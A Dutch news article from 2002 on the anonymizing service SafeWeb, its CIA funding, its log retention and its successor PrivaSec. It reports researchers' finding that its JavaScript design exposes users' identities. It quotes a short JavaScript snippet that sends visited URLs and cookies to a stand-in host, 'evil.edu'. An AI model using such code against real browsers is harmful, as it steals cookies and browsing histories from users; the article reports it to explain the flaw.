SAFEWEB MINDER VEILIG DAN GEDACHT
De anonimiseringsdienst SafeWeb is nooit veilig geweest. Gebruikers zijn misleid door de marketingtaal van de directeur en de enthousiaste artikelen in media. Dit stellen twee Amerikaanse onderzoekers die middels eenvoudige aanvallen op de techniek van SafeWeb aantonen dat de gegevens van anonieme surfers te achterhalen zijn.
Anderhalf jaar geleden kwam SafeWeb nog als "onbetwiste winnaar" uit de bus, toen de redactie van Netkwesties een aantal anonimiseringsdiensten testte. Geprezen werden de snelheid en het feit dat de gebruiker zelf het privacyniveau kon instellen. Ook andere media waren enthousiast. ComputerWorld bood SafeWeb-CEO Jon Chun ruimte om zijn product aan te prijzen nadat de CIA 1 miljoen dollar in het bedrijf had geïnvesteerd: "It has put SafeWeb and our technologies through the rigors of the CIA's stringent review process, which far exceeds those of the ordinary enterprise client. This is a very significant seal of approval." PC World riep SafeWeb uit tot 'Best of the Web 2001'.
Ongeveer een jaar later maakte Netkwesties melding van een bericht in The Register waarin stond dat SafeWeb niet erg zorgvuldig met de privacy van zijn gebruikers omging. De anonieme websurfdienst bleek de surfgegevens van gebruikers zeven dagen te bewaren. "What do we do with the logs?" schrijft een medewerker van SafeWeb aan privacyvoorvechter John Young, die de site Cryptome onderhoudt. "Every night we tar them up, ship them to a central machine, compile stats on how many clients we served and how many ads we served, gpg the logs, and store them for 7 days."
Daarna worden ze gewist, aldus SafeWeb.
Er was meer dat SafeWeb verdacht maakte. Het bedrijf gebruikte een server van het Amerikaanse ministerie van Defensie om het opvragen van webpagina's te anonimiseren. Eerder riep financiering van de CIA al de nodige vragen op bij privacybewuste internetgebruikers.
Eind november 2001 sluit SafeWeb de anonieme webdienst, die 3 miljoen pageviews per dag trok, omdat het bedrijf te weinig geld verdient. De technologie wordt in licentie gegeven aan PrivaSec. Dit bedrijf biedt nu onder de naam SurfSecure een anonieme webdienst aan, die voorlopig gratis is.
Of de dienst, die is gebaseerd op de technologie van SafeWeb, betrouwbaar is, is zeer de vraag. Twee onderzoekers, Andrew Schulman van de Privacy Foundation en assistent-hoogleraar Informatica David Martin van Boston University, tonen in een onlangs gepubliceerd rapport aan dat SafeWeb vanaf de dag van de opening in april 2000 onveilig is geweest. De claim van het bedrijf dat het echte anonimiteit bood, klopte niet, zeggen Martin en Schulman.
De technologie van de anonimiseringsdienst, gebaseerd op JavaScript, is volgens Martin en Schulman verkeerd ontworpen waardoor de gegevens van de gebruikers eenvoudig te achterhalen zijn. De onderzoekers zeggen 3-4 dagen nodig gehad te hebben om een programma te schrijven waarmee de identiteit van de anonieme surfers bekend gemaakt kan worden. De privacy-aanvallen van Martin en Schulman kunnen worden nagedaan op SurfSecure van PrivaSec.
De technologie van SafeWeb en PrivaSec is heel simpel te misbruiken, schrijft Martin in een bericht op de beveiligingsmailinglijst BugTraq. De "simpelste JavaScript aanval" door een website of een firewall is volgens Martin voldoende om SafeWeb en zijn opvolger PrivaSec als spyware te laten fungeren. De code
self['window']['top'].frames[0]['cookie_munch'] = Function('i=new
Image(1,1);i.s'+'rc="https://evil.edu/"+top.frames[0].document.forms["fugulo
cation"].URL_text.value+(new Date()).getTime()+document.cookie;');
leidt ertoe dat de site evil.edu alle webadressen en cookies ontvangt die een anonieme surfer via SafeWeb heeft opgevraagd respectievelijk ontvangen. In het rapport staat nog een aantal voorbeelden waarmee SafeWeb kan worden aangevallen.
SafeWeb zou al sinds mei 2001 op de hoogte zijn van het lek. Schulman en Martin hebben hun bevindingen in oktober 2001 voorgelegd aan SafeWeb en in januari van dit jaar aan PrivaSec. Ook de voorlopige versie van hun rapport hebben ze de bedrijven laten lezen.
Dat SafeWeb en PrivaSec lek zijn, wekt geen verbazing bij de meeste internetdeskundigen. Het is algemeen bekend dat JavaScript niet robuust genoeg is voor beveiligingsdiensten. Wel opmerkelijk is de reactie van SafeWeb-voorzitter Stephen Hsu in Wired News. De CIA zou op de hoogte geweest zijn van de kwetsbaarheden van de technologie, maar dat niet als een groot gevaar beschouwd hebben. "They were aware of these capabilities but they did not deem it to be a threat", aldus Hsu in Wired News.
[MJK, 21 februari 2002]
